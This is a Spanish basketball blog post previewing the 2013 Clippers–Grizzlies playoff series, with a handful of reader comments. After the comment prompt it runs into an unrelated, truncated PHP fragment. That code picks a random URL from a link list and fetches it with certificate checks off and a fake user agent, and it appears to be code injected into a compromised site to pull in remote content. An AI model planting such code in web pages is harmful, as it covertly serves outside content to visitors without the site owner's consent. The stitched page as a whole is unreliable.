Previa Los Angeles Clippers – Memphis Grizzlies

20 de April de 2013 por MagicJohnson32

“Tú cara me suena de algo ¿Acaso nos hemos visto antes?”. Hace un año, Clippers y Grizzlies disputaron una de las mejores -o al menos más intensas, igualadas y apasionantes- series de primera ronda que recordamos, al estilo de aquellas benditas locuras entre Heat y Knicks a finales de los 90. En aquella ocasión, casi cada partido se decidió en los últimos minutos y la sensación que nos quedó es que los Grizzlies desaprovecharon una oportunidad que tal vez no se les volvería a presentar. Especialmente dolorosa para Memphis fue la derrota en el primer partido de la serie, en el que los Clippers remontaron 27 puntos. Para colmo, los angelinos se llevaron la eliminatoria en el séptimo partido, disputado en cancha de los Grizzlies.

La fisonomía de ambos equipos ha cambiado mucho desde entonces. Los Clippers han incrementado su arsenal ofensivo, especialmente en su segunda unidad, encabezada por Jamal Crawford y una de las más potentes de la liga. Los Grizzlies, que perdieron a OJ Mayo en verano y traspasaron a Rudy Gay durante la temporada, han apuntalado su apuesta por la defensa con la llegada de Prince. Los resultados avalan tanto a los californianos como a los de Tennessee, puesto que han completado una excelente fase regular, las mejores de la historia de ambas franquicias, y han firmado balances idénticos (56-26). La ventaja de campo corresponde en esta ocasión a los Clippers, aunque no parece que este factor vaya a ser determinante.

Claves de la eliminatoria:

  • La guerra en la pintura: los tiros fáciles escasearán, los porcentajes serán bajos y no habrá un segundo de tregua, así que será esencial salir vencedor de la batalla cerca de los aros. Los rebotes, las segundas oportunidades y los puntos en mates y bandejas decantarán más de uno y de dos partidos de la serie. El año pasado Zach Randolph llegó muy justo a los Playoffs y los Grizzlies ignoraron a Marc Gasol en demasiadas ocasiones, mientras la batería interior de los Clippers produjo por encima de las expectativas. Pero ya no están Kenyon Martin ni Reggie Evans, sino Odom y Hollins, y los Clippers cuentan con Ed Davis y Arthur, quienes pueden jugar papeles importantes en la eliminatoria. Gasol ha de ser un gigante en defensa y obligar a Griffin a alejarse del aro, donde su efectividad es limitada.
  • En manos de Paul y Conley: tanto Clippers como Grizzlies se despliegan como el resultado lógico de aquello que representan sus respectivos bases. La marcha de Gay ha supuesto la cesión definitiva de galones en la figura de Conley, que ha crecido y al que le hemos visto más cómodo que nunca asumiendo responsabilidades en ataque. En sus manos recaerán dos responsabilidades fundamentales: la de surtir de balones a Randolph y Gasol, y la de no perder balones que permitan a los Clippers ponerse en modo Lob City. Por su parte, la trascendencia de Chris Paul en su equipo es incalculable. Domina el tempo, da pista libre a los despegues de Griffin y DeAndre Jordan y, por encima de todo, se adueña del partido cuando llega igualado a los minutos finales, situación que probablemente se repetirá a lo largo de la serie. De ser así, el factor CP3 decantará la balanza.
  • La vida más allá del quinteto: el arsenal de recambios del que dispone Del Negro es infinitamente superior al de Lionel Hollins. Bledsoe, Billups, Crawford, Barnes, Grant Hill y Odom suponen una combinación de energía, experiencia, anotación, calidad y defensa con la que el banquillo de los Grizzlies no puede ni soñar. Bastante harán Bayless, Daye, Pondexter, Arthur, David y Dooling si son capaces de mantener equilibrado el duelo entre segundas unidades. Para los Grizzlies será crítico que sus suplentes sean capaces de anotar tiros exteriores (principal carencia de los titulares) y aprovechen los espacios que se crearán cuando la defensa se cierre sobre Randolph y Marc.

Pronóstico: Chris Paul decidirá. 4-3 Clippers.

Comenta

5 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Chris Paul es demasiado para estos Grizzlies. Está que se sale el tío. Y Crawford ni te cuento. 4-2 para Clippers

      Citar

  2. melo15 dice:
    #2

    A las 4,00 en Cuatro. Imperdible.

      Citar

  3. Jose Luis dice:
    #3

    04:30 realmente, a las 04:00 empieza la previa. Yo a esa hora estaré durmiendo, quizá vea algo del Bulls @ Nets

      Citar

  4. Tobal dice:
    #4

    Los Grizzlies deben de mejorar en el segundo partido,deben de aparecer más,tanto Marc Gasol como Zach Randolph,tanto para anotar como para dominar el rebote,si no es así,veo dificil que ganen el segundo partido de esta noche.

      Citar

  5. Tobal dice:
    #5

    Los Grizzlies deben de mejorar en el segundo partido,deben de aparecer más,tanto Marc Gasol como Zach Randolph,tanto para anotar como para dominar el rebote,si no es así,veo dificil que ganen el segundo partido de esta noche.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>